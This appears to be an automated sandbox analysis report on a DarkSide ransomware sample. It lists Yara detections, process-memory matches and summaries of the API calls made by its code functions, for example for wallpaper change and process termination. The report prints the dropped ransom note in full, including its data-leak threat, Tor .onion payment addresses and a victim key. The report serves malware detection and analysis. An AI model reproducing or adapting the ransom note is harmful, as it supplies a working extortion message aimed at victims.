                      Source: P3FwQWmwUM.exe, 00000001.00000002.232594392.00000000007AA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      Spam, unwanted Advertisements and Ransom Demands:

                      barindex
                      Found ransom note / readmeShow sources
                      Source: C:\README.2c9ccbf3.TXTDropped file: ----------- [ Welcome to Dark Side] ------------->What happend?----------------------------------------------Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data.But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network.Follow our instructions below and you will recover all your data.Data leak----------------------------------------------First of all we have uploaded more then 100 GB data.Example of data: - Accounting data - Executive data - Sales data - Customer Support data - Marketing data - Quality data - And more other...Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHCThe data is preloaded and will be automatically published if you do not pay.After publication, your data will be available for at least 6 months on our tor cdn servers.We are ready:- To provide you the evidence of stolen data- To give you universal decrypting tool for all encrypted files.- To delete all the stolen data.What guarantees?----------------------------------------------We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests.All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems.We guarantee to decrypt one file for free. Go to the site and contact us.How to get access on website?----------------------------------------------Using a TOR browser:1) Download and install TOR browser from this site: https://torproject.org/2) Open our website: http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68When you open our website, put the following data in the input form:Key:pr9gzRnMz6qEwr6ovMT0cbjd9yT56NctfQZGIiVVLgo0ME2EQpAUyZucG9BLrOJjno5XLPvCN11TFfnlFHa42u5mJxoeR5k5RUgQAC1MC6LBUj4YOOAUyiBrRHQSUM3pzGoEPRVOzXSZ8YqkJyFL0TDFBbWaBKQDOSo9GzKKoVRQ0Eb02F5geTPkTAqZZSfSQ6PBBlTGPSgGe2kCyuwwp7lDmRSJlNnHssMMZHVhXzyZ6fxiBYgNiuusFK8JNI5nrtRPp3bMAc6OEddxfJWj6o2GT1Xg9j87Jp4Oyv43E1J61jLJAWBkmoBB3Gqv07mtyDW5PnmxBlNzABbLFEvJMQL23sR8nnw4svzcZHxrqD1xRcxqyeKtsaQ5yqLvyQgMdnrI2QoCqkHYYUfBIzjO8BXyBZdmjHanXE57jdDAhjaDUUqfL917cCyJr1uwVR0Xj5lJXe8BIKHd3dFrz70CsIXFAhicOsBlFzIndaNcAXXyL8Fg1avIXOcuEkGRDXt8Cs8b3TAB6n4DrbLJdiFjECo8yCA9pxvzqjXatumUloblWFZaUoLVYzP!!! DANGER !!!DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them.!!! DANGER !!!Jump to dropped file
                      Yara detected DarkSide RansomwareShow sources
                      Source: Yara matchFile source: 00000004.00000003.432905231.0000000002DB4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.362840336.0000000002B69000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.327849253.0000000000849000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.411060522.0000000002D70000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.408654426.0000000002B6A000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.236181936.00000000007C8000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.435986395.0000000002DB4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.337715138.0000000002B07000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.299389052.00000000007F2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.516574687.0000000002DA2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.478288044.0000000002AB7000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.282398886.000000000084D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.303767851.00000000007F2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.439503040.0000000002AB7000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.298944879.00000000007F2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.307244631.00000000007F2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.442911884.0000000002E08000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.295652654.0000000002AA0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.428084952.0000000002B47000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.288394609.000000000084C000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.408145616.0000000002B69000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.330427301.0000000000849000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.306781726.00000000007F2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.292805057.0000000002A90000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.281893608.000000000084D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.483773853.0000000002E39000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.297343335.00000000007F2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.282524954.000000000084D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.433763245.0000000002D60000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.288157426.000000000084C000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.411401825.0000000002D70000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.321471581.00000000007F2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.436219840.0000000002D60000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.282409788.000000000084D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.430404279.0000000002DB4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.411544467.0000000002B47000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.432232782.0000000002D60000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.474609577.0000000002D60000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.407959058.0000000002B69000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.429585276.0000000002B47000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.328363880.0000000000849000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.236245311.00000000007C8000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.411912846.0000000002B47000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.302439227.00000000007F2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.290040157.000000000084C000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.307472011.00000000007F2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.443960653.0000000002D60000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.353326118.0000000002B47000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.516426859.0000000002D40000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.362876492.0000000002D40000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.433058006.0000000002D60000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.288198091.000000000084C000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.434687514.0000000002DB4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.328783962.0000000000849000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.279059079.000000000084D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.411798869.0000000002D70000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.293724321.0000000002A90000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.510936905.0000000000768000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.408432832.0000000002D70000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.509189468.00000000004F8000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.456394908.0000000002AB7000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.347522767.0000000002AA7000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.409934886.0000000002B69000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.411159789.0000000002B47000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.410791890.0000000002B4D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.447874704.0000000002AB7000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.337437975.0000000002B07000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.433675898.0000000002DB4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.431227855.0000000002DB4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.408616972.0000000002B69000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.428965052.0000000002B47000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.307770705.00000000007F2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.288409928.000000000084C000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.348924422.0000000002AA7000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.280790972.000000000084D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.280803963.000000000084D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.492039293.0000000002D40000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.232594392.00000000007AA000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.440558230.0000000002D60000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.294802191.0000000002AA0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.440164319.0000000002AB7000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.353303558.0000000002B47000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.304436022.00000000007F2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.428206439.0000000002D70000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.443023882.0000000002D60000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.293143940.0000000002A90000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.432131880.0000000002DB4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.409798220.0000000002D70000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.428389024.0000000002B47000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.289927003.000000000084C000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.328127290.0000000000849000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.493025969.0000000002D40000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.368476921.0000000002D40000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.429695025.0000000002B47000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.448359001.0000000002D60000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.304226241.00000000007F2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.483856895.0000000002D40000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.293461617.0000000002A90000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.410319943.0000000002B4D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.410677619.0000000002D70000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.235019158.0000000000537000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.349425661.0000000002AA7000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.321323465.00000000007F2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.311791138.00000000007F2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.337762957.0000000002B07000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.409162945.0000000002B69000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.434752909.0000000002D60000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.302198707.00000000007F2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.415423650.0000000002B47000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.410205898.0000000002D70000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.473912941.0000000002D60000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.479859917.0000000002E18000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.439469384.0000000002E08000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.505242943.0000019FB6B02000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.295417556.0000000002AA0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.456833891.0000000002D60000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.294724805.0000000002AA0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.480034130.0000000002D50000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.429089053.0000000002D70000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.298539675.00000000007F2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.409597850.0000000002B69000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.431347630.0000000002D60000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.409312887.0000000002D70000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.441657546.0000000002D60000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.430481720.0000000002D60000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.415984076.0000000002B47000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.458381849.0000000002D60000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.415652999.0000000002D70000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.336753706.0000000002B07000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.408806702.0000000002D70000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.281911971.000000000084D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: P3FwQWmwUM.exe PID: 5976, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: P3FwQWmwUM.exe PID: 2900, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: notepad.exe PID: 7048, type: MEMORY
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Source: Yara matchFile source: C:\README.2c9ccbf3.TXT, type: DROPPED
                      Contains functionalty to change the wallpaperShow sources
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_004033B9 CreateFontW,SelectObject,RtlAllocateHeap,_swprintf,GetTextExtentPoint32W,SelectObject,SetTextColor,SetBkMode,SetBkColor,DrawTextW,memset,SelectObject,SHGetSpecialFolderPathW,wcscat,wcslen,CreateFileW,WriteFile,WriteFile,WriteFile,NtClose,wcscat,RegCreateKeyExW,wcslen,RegSetValueExW,wcslen,RegSetValueExW,SystemParametersInfoW,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,NtClose,NtClose,DeleteObject,DeleteObject,RtlFreeHeap,DeleteObject,DeleteDC,DeleteDC,1_2_004033B9

                      System Summary:

                      barindex
                      PE file has a writeable .text sectionShow sources
                      Source: P3FwQWmwUM.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeProcess Stats: CPU usage > 98%
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00401D45 RegCreateKeyExW,RegQueryValueExW,memcpy,RtlFreeHeap,NtClose,RtlFreeHeap,1_2_00401D45
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_0040911D CommandLineToArgvW,NtClose,NtClose,RtlFreeHeap,OpenMutexW,NtClose,CreateMutexW,ReleaseMutex,NtClose,NtClose,NtClose,1_2_0040911D
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00401EBC NtOpenProcessToken,NtQueryInformationToken,LookupAccountSidW,_wcsicmp,RtlFreeHeap,_wcsicmp,RtlFreeHeap,_wcsicmp,RtlFreeHeap,NtClose,1_2_00401EBC
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00409042 NtSetThreadExecutionState,GetTickCount,GetTickCount,1_2_00409042
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00402E44 NtQueryInstallUILanguage,NtQueryDefaultUILanguage,1_2_00402E44
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00408249 memset,RegCreateKeyExW,RegQueryValueExW,RtlAllocateHeap,NtClose,RtlFreeHeap,RtlFreeHeap,1_2_00408249
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00405756 NtQuerySystemInformation,RtlAllocateHeap,NtOpenProcess,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,1_2_00405756
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00408F5B GetProcessId,_swprintf,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,NtClose,1_2_00408F5B
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_0040625C wcslen,wcslen,RtlAllocateHeap,wcscpy,wcscat,SetFileAttributesW,CreateFileW,RtlAllocateHeap,ReadFile,NtClose,RtlFreeHeap,RtlFreeHeap,1_2_0040625C
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00402160 NtOpenProcessToken,NtQueryInformationToken,RtlAllocateHeap,NtQueryInformationToken,NtAdjustPrivilegesToken,RtlFreeHeap,NtClose,1_2_00402160
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00401B60 NtSetInformationThread,1_2_00401B60
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00408160 RegCreateKeyExW,RegQueryValueExW,RtlAllocateHeap,wcscpy,NtClose,RtlFreeHeap,RtlFreeHeap,1_2_00408160
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00405564 RtlAllocateHeap,NtQueryObject,RtlReAllocateHeap,RtlFreeHeap,_wcsicmp,RtlFreeHeap,1_2_00405564
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00402367 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtAllocateVirtualMemory,wcscpy,wcscat,wcslen,RtlFreeHeap,RtlEnterCriticalSection,RtlInitUnicodeString,RtlInitUnicodeString,RtlLeaveCriticalSection,LdrEnumerateLoadedModules,1_2_00402367
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_0040456A SHGetSpecialFolderPathW,GetTempFileNameW,RtlAllocateHeap,memset,memset,CreateProcessW,WaitForSingleObject,NtClose,NtClose,DeleteFileW,RtlFreeHeap,RtlFreeHeap,1_2_0040456A
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00404878 RtlAllocateHeap,NtQuerySystemInformation,RtlReAllocateHeap,RtlFreeHeap,NtOpenProcess,NtTerminateProcess,NtClose,RtlFreeHeap,1_2_00404878
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00405778 NtQuerySystemInformation,RtlAllocateHeap,NtOpenProcess,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,1_2_00405778
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00403303 NtOpenProcessToken,NtQueryInformationToken,ConvertSidToStringSidW,wcscpy,RtlFreeHeap,NtClose,1_2_00403303
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00402003 NtQueryInformationToken,RtlAllocateHeap,NtQueryInformationToken,RtlFreeHeap,1_2_00402003
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00406C06 wcslen,wcslen,RtlAllocateHeap,wcschr,_swprintf,memset,memset,CreateProcessAsUserW,CreateProcessWithTokenW,CreateProcessW,_swprintf,CreateFileMappingW,ResumeThread,NtClose,RtlFreeHeap,1_2_00406C06
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00408016 RegCreateKeyExW,RegQueryValueExW,RegQueryValueExW,RtlAllocateHeap,wcscpy,NtClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,1_2_00408016
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00405C1C SetFileAttributesW,CreateFileW,PathIsNetworkPathW,SetFilePointerEx,ReadFile,memcmp,NtClose,1_2_00405C1C
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00407B27 GetModuleFileNameW,RtlAllocateHeap,wcslen,wcslen,RtlAllocateHeap,wcscat,wcscat,WaitForMultipleObjects,NtClose,RtlFreeHeap,WaitForMultipleObjects,NtClose,RtlFreeHeap,1_2_00407B27
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00407D2C GetModuleFileNameW,WaitForSingleObject,NtClose,1_2_00407D2C
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00405E35 wcslen,wcslen,RtlAllocateHeap,wcscpy,wcscat,RtlAllocateHeap,wcscpy,wcscat,MoveFileExW,CreateFileW,CreateIoCompletionPort,NtClose,RtlAllocateHeap,NtClose,memcpy,memcpy,PostQueuedCompletionStatus,RtlFreeHeap,NtClose,InterlockedIncrement,RtlFreeHeap,RtlFreeHeap,1_2_00405E35
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00405CC1 SetFilePointerEx,NtClose,1_2_00405CC1
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_004055D1 NtQueryObject,_wcsicmp,RtlFreeHeap,1_2_004055D1
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_004056D4 PathFindFileNameW,RtlAllocateHeap,NtQuerySystemInformation,RtlReAllocateHeap,RtlFreeHeap,RtlAllocateHeap,NtOpenProcess,NtDuplicateObject,PathFindFileNameW,_wcsicmp,RtlAllocateHeap,NtQueryInformationProcess,PathFindFileNameW,NtTerminateProcess,WaitForSingleObject,NtClose,NtClose,memset,memset,NtClose,NtClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,1_2_004056D4
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00408BD6 NtSetThreadExecutionState,wcslen,RtlAllocateHeap,wcsstr,wcscat,RtlFreeHeap,wcscpy,GetFileAttributesW,PathIsUNCServerW,PathFindExtensionW,_wcsicmp,RtlFreeHeap,PathIsNetworkPathW,wcslen,RtlAllocateHeap,wcscat,RtlFreeHeap,PathIsNetworkPathW,wcslen,RtlAllocateHeap,wcscat,RtlFreeHeap,1_2_00408BD6
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_004048D8 NtQuerySystemInformation,NtOpenProcess,NtTerminateProcess,NtClose,RtlFreeHeap,1_2_004048D8
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_004022D9 NtSetInformationProcess,NtSetInformationProcess,1_2_004022D9
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_004072E0 CreateThread,WaitForSingleObject,NtTerminateThread,GetExitCodeThread,NtClose,1_2_004072E0
